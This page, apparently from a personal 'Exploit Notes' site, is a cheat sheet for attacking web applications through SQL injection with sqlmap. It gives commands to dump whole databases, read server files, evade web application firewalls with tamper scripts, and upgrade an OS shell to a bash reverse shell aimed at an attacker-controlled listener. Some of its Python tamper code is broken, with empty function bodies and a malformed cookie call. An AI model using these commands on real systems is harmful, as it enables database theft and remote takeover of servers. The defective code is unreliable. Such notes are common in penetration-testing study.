Exploit Notes

SQL Injection with Sqlmap

Last modified: 2023-02-10

Database Reverse Shell SQL Injection Web

SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This page provides how to inject SQL using sqlmap.

Basic Commands

# GET request
sqlmap -u "http://<target-ip>/?search=test"
# -p: target parameter
sqlmap -u "http://<target-ip>/?category=test&item=1" -p item 

# Header param injection
sqlmap -u "https://example.com/?search=test" --headers "X-Forwarded-For: 1*"

# POST request
sqlmap -u "http://<target-ip>" --data="username=test&password=test"

Using Request File

We can specify a request file which is generated in Burp Suite.
It can be used by adding the "-r" flag.

sqlmap -r request.txt
sqlmap -r request.txt --dump --dbs --tables --columns --random-agent
sqlmap -r request.txt --dump --dbms mysql --risk 3 --level 5

# --fresh-queries: new data in tables
sqlmap -r request.txt --fresh-queries

# --current-user: Retrieve current user
sqlmap -r request.txt --current-user
# --current-db: Retrieve current DB
sqlamp -r request.txt --current-db

# Specify dabase name, table name, column name
sqlmap -r request.txt -D database_name -T table_name -C column_name
# Specify multiple columns
sqlmap -r request.txt -D database_name -T table_name -C username,password

# --technique U: Union attack
# --delay 2: Time delay
sqlmap -r request.txt --technique U --delay 2
# --technique T: Time-based Blind SQLi
sqlmap -r request.txt --technique T

# --time-sec: Sleep time for Time-Based Blind SQLi
sqlmap -r request.txt --time-sec 2

# --ignore-code: Ignore specific response
sqlmap -r request.txt --ignore-code 401

# --dump-all: Dump all database table entries
sqlmap -r request.txt --dump-all

Web Shell

Add option "--os-shell" to interact with web shell.

sqlmap -u "http://<target-ip>" --cookie="value=*" --os-shell

After activating, you may want to upgrade to the full functional shell.
You can do that using reverse shell.

In your local machine,

nc -lvnp 4444

Then execute the following command in web shell.

os-shell> bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'

Read Files

# --batch: never ask for user input, use the default behavior
sqlmap -r request.txt --file-read "/var/www/html/index.php" --time-sec 10 --batch
sqlmap -r request.txt --file-read "/var/www/<subdomain>/index.php" --time-sec 10 --batch

sqlmap -u "http://<target-ip>/?q=test" --file-read "var/www/html/index.php" --time-sec 10 --batch


The sqlmap can be tampered by custom python script e.g. tamper.py or the default library.

WAF (Web Application Firewall) Bypass

This post explains details for what each module works.

# General
sqlmap -r request.txt --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

sqlmap -r request.txt --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

sqlamp -r request.txt --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Custom tamper modules (Base64 encode)

We can also create our custom modules.
For instance, we create "tamper.py".

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
def tamper(payload, **kwargs):
    payload = encodeBase64("%s" % payload, binary=False)
    return payload

Then execute sqlmap.

# The tamper is a module, so we need to create __init__.py in the current directory.
touch __init__.py
sqlmap -u "https://example.com/" --cookie "session=*" --tamper=tamper.py

Multiple Requests

import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

address = "http://vulnerable.com"
password = "test"

def dependencies():

def create_account(payload):
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        resp = s.post(f"{address}/signup", data=data)

def login(payload):
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        resp = s.post(f"{address}/login", data=data)
        sessid = s.cookies.get("session"None)
    return "session={}".format(sessid)

def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    headers["Cookie"] = login(payload)
    return payload

Then run the sqlmap with the tamper option.

sqlmap --tamper tamper.py --url http://vulnerable.com/signup --data "username=admin&password=test" --second-url "http://vulnerable.com/post" --no-cast

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.